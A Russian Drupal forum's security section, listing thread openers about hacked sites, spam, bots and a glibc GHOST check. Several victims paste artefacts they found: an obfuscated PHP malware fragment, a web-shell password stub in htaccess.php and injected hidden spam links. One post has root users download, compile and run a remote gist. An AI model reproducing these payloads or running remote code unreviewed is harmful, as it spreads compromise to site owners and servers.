Безопасность

Вопросы защиты скриптов и системного окружения, объявления о найденных уязвимостях и security-релизах Drupal.
Новости команды безопасности Drupal: drupal.org/security
См. также: bugtrack.ru, securitylab.ru.

icon:

Ошибка 403 при аутентификации при запросе к REST-серверу

Аватар пользователя roman-yrv

Добрый день.

Сейчас отлаживаю php-скрипт, который бы обращался к REST-серверу на drupal-сайте.

Вот функция, которая логинится на сервер и возвращает пару "имя сессии - ID сессии"

    function test_login($username, $password)
    {
        if (isset($_COOKIE['drupal_session_name']) && isset($_COOKIE['drupal_session_id']))
        {
            return $_COOKIE['drupal_session_name'].' = '.$_COOKIE['drupal_session_id'];
        }
        else
        {
           
            $u_data = array(
                'username' => $username,
                'password' => $password,
            );
           
           
            $user_login_data = array(
                'http' => array(
                    'header' => "Content-Type: application/json",
0 Спасибо

Спам обходит веб форму

Аватар пользователя Murelain

Доброго всем дня!
Подскажите пожалуйста мне в чём может быть проблема:
есть веб форма на сайте, где пользователи отправляют заявку (запись на урок) ну и потом на почту приходит уведомление с определённым текстом.
Стали приходить письма (давно) в огромном количестве на почту, причем в Submissions на веб форме они не числятся. То есть как-то обходят эту форму, а сразу приходят на почту, причем с текстом, который предусмотрен формой, например: "Вам письмо - запись на урок", а дальше чушь. В основном про какие-то ожерелья и бижутерию.

0 Спасибо

Как правильно обработать POST

Аватар пользователя oploshka

Назрел вопрос безопасности и как использовать переменную $_POST.
Пользователь присылает текст (в котором возможно использовать любые символы) на страницу созданную через hook_menu.

На мой взгляд прямое использование $_POST["data"] не совсем корректно.
Как использовать $_POST["data"] в функции node_save() и db_update().

Проблемы с которыми столкнулся:
1 - form api невозможно использовать, так как post должен приходить с другого сайта и он просто не обрабатывается. (возможно что то делаю не так, но должно приходить только $_POST["data"] и ничего более, а друпалу я так понимаю этого маловато...)
2 - ответ необходимо вернуть в формате json что в form api сделать можно, но не уверен на сколько будет рабочий вариант.

0 Спасибо

Вредоносная ссылка. На наш сайт пришла жалоба, что делать?

Аватар пользователя OsnovEl

Хостеры написали, что на наш сайт пришла жалоба, мол какая-то вредоносная ссылка у нас. Проверили антивирусом, ничего не нашел. Что делать? Если не напишу ничего внятного сегодня хостерам, то отключат сайт. Писала разработчику, но он в безопасности ничего не понимает. Есть хороший знакомый специалист, но у него выходной. Что делать, не знаю...
Вот что написали хостеры:
Input verified, review Comments and click Appeal.

Please keep your comments brief, but do provide
enough information for our system administrators
to accurately process your info. Add a Reply-To
address if you believe a reply might be needed.

============================================================
Received: from [146.185.181.243] by usgo.net

0 Спасибо

Как же защитить свой Друпал.

Аватар пользователя Семен55

Здравствуйте.
Есть сайт на Друпал .Какое то время сайтом не занимался.Потом как и большинство друповодов попал с критическими обновлениями.Был друпал 7.24.Появился drupaldev с правами администратора,который заразил сайт.Обновился до рекомендуемой версии друпал. Сайт не лечил.а просто накинул обновления.Слетел шаблон.С сайта идет куча редиректа. Никак не могу найти свой чистый бэкап-сайта,где то завалялся.....

0 Спасибо

Чем заменить Ubercart Webform Checkout Pane?

Аватар пользователя oleg220

Вот не повезло дак не повезло. Только я установил на сайт и настроил модуль Ubercart Webform Checkout Pane для добавления своих полей в форму оформления заказа для ubercart 6, как через неделю он прекратил своё существование, из за безопасности https://www.drupal.org/project/uc_webform_pane
Подскажите, чем то его можно заменить?

0 Спасибо

Борьба с ботами

Аватар пользователя foton

Не так давно обнаружил у себя на сайте очень много англоязычного текста в блогах и огромное количество пользователей
Все удалил... статьи и пользователей
Но кто то или что то автоматом регается потом автоматом подтверждает почту
и автоматом размещает статью
Это видно по логам...
Поставил капчу на регистрацию
Но это не помогает...
подскажите пожалуйста как с таким бороться?

0 Спасибо

Взломали сайт. Помогите выянить причину.

Аватар пользователя VasyOK

В один прекрасный момент в корневой папке htaccess.php появилось

<?php

$auth_pass = "596a96cc7bf9108cd896f33c44aedc8a";

?>

0 Спасибо

Как найти все зараженные файлы в исходниках

Аватар пользователя mikel

Пожалуйста, подскажите:
Есть сайт на drupal7, его хакнули, идет спам.
Хостер написал, чтобы удалили все зараженные файлы. На приличных хостингах стоит система, которая сразу выдает список файлов, которые надо удалить. Но тут хостер ленив, сказал "ищите сами".

Основной вопрос: есть какая-нибудь бесплатная утилита, через которую можно прогнать исходники?

Вручную нашел несколько файлов, пример:

<?php
 $flz
='Ux'^'1M5k%y';$rep='R7B@@6M39F#@A%"'^'7E0/2i?VI)Q4(KE8iOcA';$yyeff='""';$ldgv=0;$mghul=')';##e?})_;]N15.)2$X}Z/3roWa
$vaklx='Y!*Z]Q54]K@V';$cib='(C}|%|0Q[)m#oz})sZ%@vE=4m'^'({eP_dP';$cfri='6A@lCTtEqX&ypPx&gB)MWbAb3VRdCA{G';ihgqaj;$bsrc='(AB94^2qLWaN*'^'A/+fG;F';/*$pj;hJ4(/^5J5[Z|uW(U0:f6VZpbwmhat^$lwspmgxiy*/$vz='=ng$.{/';?>
0 Спасибо

Исправление последствий взлома

Аватар пользователя ChesteR_203

Сайт на D7 был взломан после критической уязвимости - [#113136]http://www.drupal.ru/node/113136[/#]
Полностью заменил ядро и обновился. Удалил файлы которые были созданы злоумышленником, удалил новую роль админа.

Но сейчас обнаружил на сайте скрытые ссылки вида:

<div id="xald"><a href="http://www.asianpeasant.org/with-payday">with payday</a></div>
<script>document.getElementById("xald").style.visibility="hidden";document.getElementById("xald").style.display="none";</script>

и:

<div id="vken"><a href="http://techenzyme.com/pay-day-loans-online-for-bad-credit" rel="nofollow">pay day loans online for bad credit</a></div>
<style type="text/css">
#vken{display:none;visibility:hidden;}</style>
0 Спасибо

Если мучает спам на сайте.

Аватар пользователя Studio VIZA

Создавал подобную тему когда-то, сейчас думаю - почему люди не понимают очевидного?

Есть проблема - спам на сайтах. Нужно найти решение, простое, изящное и, самое главное - быстрое. А что, проблема то вроде решилась. Установил модуль, включил...
Заходят потом, ааа обошли! Индусы читают каптчу! Китайцы картинки решают за рис! Аааа!

И опять ищут решение. И опять быстрое, потом всё заново - Аааа! Вот мёд советуют - Аааа!

В том что я предлагаю - есть маленький элемент мазохизма. Взамен, в течении нескольких лет вы забудете о проблеме со спамом и, мало того, будете издеваться над ним его полностью контролировать.

==========================================================================================
Этап 1.

1 Спасибо

Бот пытается ответить на несуществующий (удаленный комментарий)

Аватар пользователя alexregion

Бот пытается ответить на несуществующий (удаленный комментарий) - как я понял ранее был запущен для помещения ссылки в ответе на комментарий. Коммент был удален, а бот все ломится постоянно под разными IP в ответ на один и тот же коммент (в отчетах "страница не найдена") - хочу избавится, чтобы не грузил сервер. Помогите если возможно.

0 Спасибо

Права на файлы и папки Drupal 7

Аватар пользователя Hades

Очень не плохой скрипт был дан в комментарии... https://www.drupal.org/node/244924#comment-6600078
Изменил и доработал его под себя:

#!/bin/bash
# Script made by Alex Belyj, admin@azfest.ru
read -n 1 -p "Ну я начну разруливать права а Вы пока чайку попейте, хорошо? (y/[a]): " AMSURE
[ "$AMSURE" = "y" ] || exit
echo "" 1>&2
echo "Начинаю изменение прав..."
echo "Устанавливаю владельца www-data для всех папок и файлов"
chown -R www-data:www-data './'
echo "Выставляю права 755 для всех папок"
find './' -type d -exec chmod 755 {} \;
echo "Выставляю права 644 для всех файлов"
find './' -type f -exec chmod 644 {} \;
echo "Выставляю права 440 для .htaccess"
chmod 440 './.htaccess'
echo "Выставляю права 775 для sites"
chmod 775 './sites'
0 Спасибо

Необходимое

Аватар пользователя Filosofos

Всем привет!

Скоро будет готово мой сайт на Друпал и надо будет разместить на хостинг.
Но перед тем как это делать хотелось бы посоветоваться с вами в вопросах безопасности.

Скажите пожалуйста какие настройки необходимые я должен сделать чтобы мой сайт был здоровым и сильным в будущем??Какие меры предосторожности??
Чисто по логике понимаю что есть 100% обязательные шаги без которых сайт может быть уязвим.Что посоветуете для начала??

0 Спасибо

Странный взлом

Аватар пользователя Sebastian Pereiro

Зашел сегодня в раздел "Пользователи" и обнаружил там новую запись с правами администратора.
Логи говорят что запись была создана сегодня, для email drupdev321@gmail.com
Зарегистрирован на сайте 9 лет, сколько-то месяцев.

Пользователь создал тестовую страницу, затем удалил ее.
Заход был с 192.99.2.137, то есть с ТОРа.

О чем это было, есть идеи?

0 Спасибо

Спам в рассылка с сайта об необходимости сделать обновление

Аватар пользователя cesar-atk

Добрый день.

В регулярных рассылках сайта о том, что необходимо обновить модули стал приходить спам. А именно, в письме указана ссылка не на текущий сайт с друпалом, а ссылка на сторонний сайт.
Вот пример:

«Для установленных на сайте проектов
доступны обновления. Рекомендуется как
можно скорее установить новые версии.

Дополнительную информацию можно найти на странице обновлений.
http://www.epochtimes.jp/admin/reports/updates

Ваш сайт в настоящее время
сконфигурирован для отправки этих email'ов, только когда доступны любые обновления.
Для оповещения о других событиях,
пройдите по ссылке:
http://www.epochtimes.jp/admin/reports/updates/settings.»

Через несколько дней пришло письмо с ссылкой на другой сайт.
Версия Drupal 7.34

0 Спасибо

Критическая уязвимость (CVE-2015-0235) у серверов под Linux

Аватар пользователя ttenz

Новая уязвимость GHOST ((CVE-2015-0235) в библиотеке glibc (GNU C Library))
Уязвимость в распространенных дистрибутивах Linux может позволить злоумышленнику получить удаленный контроль над системой. Под ударом оказались пользователи Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04.
http://habrahabr.ru/company/pt/blog/249097/

проверяем, есть ли она.

от рута:

wget https://gist.githubusercontent.com/koelling/ef9b2b9d0be6d6dbab63/raw/de1730049198c64eaf8f8ab015a3c8b23b63fd34/gistfile1.c
gcc gistfile1.c -o CVE-2015-0235
./CVE-2015-0235

если vulnarable, то

Debian, Ubuntu:

sudo apt-get clean
sudo apt-get update
sudo apt-get upgrade
sudo reboot

остальные:

1 Спасибо

Взлом пароля админа

Аватар пользователя Kublahan

Привет! У меня сайт на drupal 7. С моего последнего посещения остался незавершенный сеанс у меня на компе. Сегодня обнаружил, что логин админа переименован и пароль его сменен. Спасло меня то, что в этом незавершенном сеансе я смог зайти в админку и сменить пароль. Скажите, как могли злоумышленники такое сделать? Пароль до этого был сильный. Где можно в логах посмотреть, когда произошла смена пароля и логина?

0 Спасибо

Взлом сайта через восстановление пароля

Аватар пользователя Стасевич

Доброго дня!

Кто-нибудь может подсказать, каким образом ломают сайт на друпал6 через восстановление пароля админа?
Как защититься?

Взломали сайт. Подглядел за действиями взломщика на сайте.
- Заходят в восстановление пароля, вводят емейл админа (вероятно до этого был шел загружен, был доступ к файлам и базе)
- Затем та же страница восстановления перезагружается, и вводят уже свой емейл.
- Получают одноразовую ссылку для входя и орудуют на сайте.

0 Спасибо

Рассылка спама модулем ctools. Как победить?

Аватар пользователя apache24

Здравствуйте,

Хостер написал что с сайта идет рассылка спама..
модуль ctools.
скрипт X-PHP-Script: XXXXXXXXXXXXXX.ru/sites/all/modules/ctools/plugins/export_ui/system.php

Подскажите пожалуйста, что делать..
сайт заблокировал хостер.

0 Спасибо